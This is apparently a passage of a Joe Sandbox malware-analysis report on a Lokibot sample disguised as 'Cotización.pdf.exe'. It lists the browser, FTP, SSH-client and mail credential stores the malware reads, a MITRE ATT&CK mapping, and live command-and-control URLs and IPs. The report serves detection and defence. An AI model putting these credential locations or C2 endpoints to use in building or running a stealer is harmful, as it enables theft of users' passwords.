              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_00406069 GetUserNameW,12_2_00406069
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 2644, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 3492, type: MEMORY
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: PopPassword12_2_0040D069
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: SmtpPassword12_2_0040D069
              Source: Yara matchFile source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 2644, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Masquerading11OS Credential Dumping2Security Software Discovery111Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Disable or Modify Tools1Credentials in Registry2Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information13DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://zamloki.xyz/des/co/tox.php0%Avira URL Cloudsafe
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              https://zamloki.xyz/des/co/tox.php0%Avira URL Cloudsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              zamloki.xyz
              		172.67.155.45
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://zamloki.xyz/des/co/tox.phptrue
                • Avira URL Cloud: safe
                		unknown
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.comCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designersGCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                          		high
                          http://www.ibsensoftware.com/Cotizaci#U00f3n.pdf.exe, Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.tiro.comCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                            		high
                            http://www.goodfont.co.krCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comlCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/cTheCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cnCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/frere-jones.htmlCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/DPleaseCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers8Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.fonts.comCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://zamloki.xyz/des/co/tox.phpCotizaci#U00f3n.pdf.exe, 0000000C.00000002.460794066.000000000049F000.00000040.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.urwpp.deDPleaseCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sakkal.comCotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    172.67.155.45
                                    		zamloki.xyzUnited States
                                    		13335CLOUDFLARENETUStrue
                                    104.21.6.222
                                    		unknownUnited States
                                    		13335CLOUDFLARENETUStrue

                                    Private

                                    IP
                                    192.168.2.1

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:451993
                                    Start date:21.07.2021
                                    Start time:17:00:18
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 25s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:Cotizaci#U00f3n.pdf.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:26
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@5/3@137/3
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 94.4% (good quality ratio 90.6%)
                                    • Quality average: 77%
                                    • Quality standard deviation: 28.5%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 74
                                    • Number of non-executed functions: 33
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 52.147.198.201, 23.54.113.53, 52.255.188.83, 40.88.32.150, 20.82.209.183, 23.54.113.104, 23.0.174.200, 23.0.174.185, 40.112.88.60, 23.10.249.43, 23.10.249.26, 20.82.210.154
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    17:01:48API Interceptor134x Sleep call for process: Cotizaci#U00f3n.pdf.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    172.67.155.45Cotizaci#U00f3n.pdf.exeGet hashmaliciousBrowse
                                    • zamloki.xyz/des/co/tox.php
                                    104.21.6.222Cotizaci#U00f3n.pdf.exeGet hashmaliciousBrowse
                                    • zamloki.xyz/des/co/tox.php

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    zamloki.xyzCotizaci#U00f3n.pdf.exeGet hashmaliciousBrowse
                                    • 104.21.6.222

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    CLOUDFLARENETUSSpecifications_Details_20330_FLQ.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    boysLove.dllGet hashmaliciousBrowse
                                    • 104.20.184.68
                                    RFQ Ranger Neo.docGet hashmaliciousBrowse
                                    • 172.67.169.145
                                    #U2706_#U260e_Play _to _Listen.htmGet hashmaliciousBrowse
                                    • 104.16.18.94
                                    Statement - 30 June 2021.exeGet hashmaliciousBrowse
                                    • 104.21.19.200
                                    8FGRxSmZMJ.exeGet hashmaliciousBrowse
                                    • 104.27.195.88
                                    Aditi Tiwari Resume.pdf.exeGet hashmaliciousBrowse
                                    • 104.21.19.200
                                    m8TJbe5yP6.exeGet hashmaliciousBrowse
                                    • 172.67.184.20
                                    triage_dropped_file.exeGet hashmaliciousBrowse
                                    • 172.67.156.203
                                    output.exeGet hashmaliciousBrowse
                                    • 162.159.135.232
                                    DOC98374933JULY2021.exeGet hashmaliciousBrowse
                                    • 104.21.13.164
                                    SecuriteInfo.com.Trojan.Win32.Save.a.312.exeGet hashmaliciousBrowse
                                    • 172.67.184.20
                                    Swift_Fattura_0093320128_.exeGet hashmaliciousBrowse
                                    • 162.159.133.233
                                    SecuriteInfo.com.Variant.Cerbu.108262.10538.exeGet hashmaliciousBrowse
                                    • 172.67.184.20
                                    PO.2100002.xlsxGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    ySZpdJfqMO.exeGet hashmaliciousBrowse
                                    • 172.67.193.180
                                    MPU702734-pdf.exeGet hashmaliciousBrowse
                                    • 104.21.13.164
                                    VrepYj22q4lsHiA.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    ELo3NhVEFBPQ3yB.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    IPVrDRKfYj.exeGet hashmaliciousBrowse
                                    • 104.21.51.99
                                    CLOUDFLARENETUSboysLove.dllGet hashmaliciousBrowse
                                    • 104.20.184.68
                                    RFQ Ranger Neo.docGet hashmaliciousBrowse
                                    • 172.67.169.145
                                    #U2706_#U260e_Play _to _Listen.htmGet hashmaliciousBrowse
                                    • 104.16.18.94
                                    Statement - 30 June 2021.exeGet hashmaliciousBrowse
                                    • 104.21.19.200
                                    8FGRxSmZMJ.exeGet hashmaliciousBrowse
                                    • 104.27.195.88
                                    Aditi Tiwari Resume.pdf.exeGet hashmaliciousBrowse
                                    • 104.21.19.200
                                    m8TJbe5yP6.exeGet hashmaliciousBrowse
                                    • 172.67.184.20
                                    triage_dropped_file.exeGet hashmaliciousBrowse
                                    • 172.67.156.203
                                    output.exeGet hashmaliciousBrowse
                                    • 162.159.135.232
                                    DOC98374933JULY2021.exeGet hashmaliciousBrowse
                                    • 104.21.13.164
                                    SecuriteInfo.com.Trojan.Win32.Save.a.312.exeGet hashmaliciousBrowse
                                    • 172.67.184.20
                                    Swift_Fattura_0093320128_.exeGet hashmaliciousBrowse
                                    • 162.159.133.233
                                    SecuriteInfo.com.Variant.Cerbu.108262.10538.exeGet hashmaliciousBrowse
                                    • 172.67.184.20
                                    PO.2100002.xlsxGet hashmaliciousBrowse
                                    • 172.67.188.154
